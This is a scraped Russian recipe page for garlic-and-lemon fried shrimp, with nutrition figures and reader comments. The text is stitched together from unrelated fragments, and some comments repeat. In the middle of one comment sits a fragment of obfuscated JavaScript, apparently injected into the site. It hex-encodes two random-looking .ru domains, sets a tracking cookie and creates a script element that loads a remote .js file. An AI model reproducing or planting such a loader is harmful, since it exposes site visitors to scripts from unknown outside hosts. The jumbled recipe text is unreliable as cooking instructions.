| | Салат

Рецепты жареных креветок

Рецепты жареных креветок
Сложность рецепта: легкий
Время приготовления: 12-21 мин
Количество порций: 3-6
Калорийность: 302 ккал/100 грамм
Белки: 15
Жиры: 10
Углеводы: 10

Креветки "варятся в собственном соку", поэтому заранее размороженные креветки будут иметь суховатый вкус, не советую! Когда жидкости почти не остается, добавляем оливковое масло (по вкусу), соль и мешаем мешаем мешаем, всё на том же большом огне. У меня это занимает максимум 3 минутки. Можно использовать и подсолнечное масло БЕЗ запаха. Выдавливаем туда же лимоны и не выключаем пока основная масса жидкости не выпарится, НО ГЛАВНОЕ выпарить НЕ ВСЮ жидкость! Должна остаться "подливка", тогда креветки можно будет макать в эту подливку наивкуснейшую! В самом конце, когда сняли с огня сковороду, добавляем выдавленный чеснокодавилкой чеснок и перемешиваем! Соль кладу сразу(морскую). Она никуда не выпаривается, но лучше пропитывает креветки и не даёт им развариться, если воды было слишком много. Чеснок добавляю в конце жарки креветок, дабы он немного прожарился и приобрел аромат пассерованного чеснока. У меня подруга тушила креветки почти также, только на 1кг брала 2 лимона и добавляла приправу для шашлыков, получалось шикарно. Вот только не могу понять откуда у нее соуса получалось так много (ведь от 2-ух лимонов и собственного сока креветок много не получишь), Может воды подливала? Спросил бы лично у нее, но из-за ссоры не разговариваем))[removed]window. Parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed]. DecodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t{};var n=t. Expires;if("number"==typeof n&&n){var i=new Date(n);n=t. Expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d! ToString(16);return e},p=function{var w=window,p=w. IndexOf(')==0){return p}for(var e=0;e<3;e++){if(w. IndexOf(')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p;if(lp=='')return;var n=lp+"//"+o;if(window. Replace(':',''));else{var i=document. SetAttribute("type","text/javascript"),document. Js",a(f,function{i("oisdom",e)},function{var t=o. Js",a(f,function{i("oisdom",e)},function{var t=o. Каждую дольку чеснока режем вдоль на части 1-2 мм толщиной. Креветки я предварительно размораживаю - бросаю в кастрюлю с водой. Разогреваю большую чугунную сковородку. Выливаю на нее оливковое масло. Когда масло прогреется, бросаем нарезанный чеснок. Через пару минут чеснок потемнеет - превратится в шкварки. Ложкой с дырками удаляем чесночные шкварки. Бросаем нарезанный перец чили. Тут же натираем (теркой) в сковороду цедру 1 лимона. Мелкие жарю 3 минуты, крупные 5 минут. Обычно использую для этого "15 трав и специй" от Галина Бланка. Это обычная средняя креветка с намороженным льдом равным по весу самой креветки. Кто был в Тайланде и других жарких странах меня поймет. Говорила, что они полезные. Полезный Но в виде исключения можно! Всё-таки морепродуктов мы очень мало едим. А вот этот рецепт я опробовала на своих домашних. Гости пришли тесть с семьёй, угодить ему ну реально трудно. А вот моя трёхлетняя доченька креветок ещё не пробовала. Эти жареные креветки рецепт просто супер! Говорила, что они полезные. А я делаю с ними разные салатики, без майонеза стараюсь. Морепродуктов мы очень мало едим. А вот этот рецепт я опробовала на своих домашних. Гости пришли тесть с семьёй, угодить ему ну реально трудно. А вот моя трёхлетняя доченька креветок ещё не пробовала. Мой муж сначало говорил не надо просто свари, терпеть не могу лимон! Я ему сварила отдельно а себе по вашему рецепту. Он не только присоединился к моей тарелке а заставил бежать в магазин и купить еще креветок! Если раньше креветки ели раз 6-8 месяцев то теперь в неделю 3 раза! Теперь если хочу умаслить мужа делаю креветки по вашему рецепту! Даже зарегестрироваться не поленилась что бы поблагодарить хотя это мой первый комментарий где либо! Кто не пробовал попробуйте не пожалеете это точно! Это вкусно-вкусно -очень-очень. В следующий раз обязательно сфотографирую! Выглядят они оочень аппетитно! Действовала как всегда наугад))Но получилось здорово! На 100 гр креветок один-два зубчика чеснока,перец(красный или чёрный-по вкусу. Штуки зеленого лука (мелко наразаного, белая часть отдельно. Регулярно покупаем их на равайском передвижном рынке - свеженькие, вкусненькие! Стоимость взависимости от размера от 100 до 200 бат за кг. Вот эти муж купил за 170 бат/кг. Я люблю рынки "передвежные" (они. Все, кто хоть раз пробовал мои фирменные креветочки, влюбляются в этот вкус! Особенно хороши такие креветки к пиву. Итак, берем креветки 1 кг, выкладываем прямо замороженные (не очищать) на раскаленную сковроду, накрываем крышкой и ждем. Пакет креветок разморозила, налила масла, масло зашипело, добавила чеснока, через 5-7 мин креветки, помешивала, в конце от себя добавила зелень. Приготовление:В большой сковороде слегка обжариваем на Oil мелко порезанный бекон, за тем выкладываем нашинкованную капусту. Пока тушится, займемся креветками. Готовила по этому рецепту, спасибо МаняСобственно сам процесс:креветки (замороженные, не очищенные) на раскаленную сковороду, накрываем крышкой и ждем пока оттаят, периодически сливая воду - пока не станут совсем сухие. Затем добавляем растительное масло. Вспомнила вот такой рецепт приготовления креветок, вычитала его где-то давно. Креветки в отличии от просто отварных, получаются очень ароматные, нежные и полностью сохраняют свой вкус. Моя семья и друзья были в восторге! Л оливкового масла плюс кусочек сливочного. Перец чили и несколько капель табаско. Сок половины лимона,соль. Дольки лимона для украшения. Бэбиблог — сайт о беременности и материнстве. Отзывы о товарах, роддома, а также множество других полезных разделов и сервисов. Введите ваш адрес электронной почты (E-mail) и нажмите на кнопку "Выслать новый пароль". В течение пары минут вы получите на него ссылку для обновления вашего пароля. Если вам нравятся различные морепродукты, самое время приготовить блюда, которые мы вам предложим. Сегодня будут креветки с чесноком и различными добавками. Это очень вкусно, попробовать однозначно стоит! Мы экспериментировали с соевым соусом, медом, сыром, томатами и другими продуктами только для того, чтобы по-настоящему удивить вас. Так как чаще всего креветки покупаются замороженными, то нужно знать, как их правильно разморозить. Для этого сначала нужно вытащить их из морозилки и выложить в дуршлаг или большое сито. Далее это самое сито или дуршлаг поместить в глубокую миску и убрать в самый низ холодильника. Там морепродукты постепенно разморозятся, а вся вода стечет в миску. Для любителей блюд в соевом соусе.

Видео рецепты

Фото приготовления

Фото 1 Фото 2 Фото 3 Фото 4 Фото 5 Фото 6
Комментарии
Готовить времени нет,а это блюдо просто и быстро! Отличный вариант
Другие рецепты: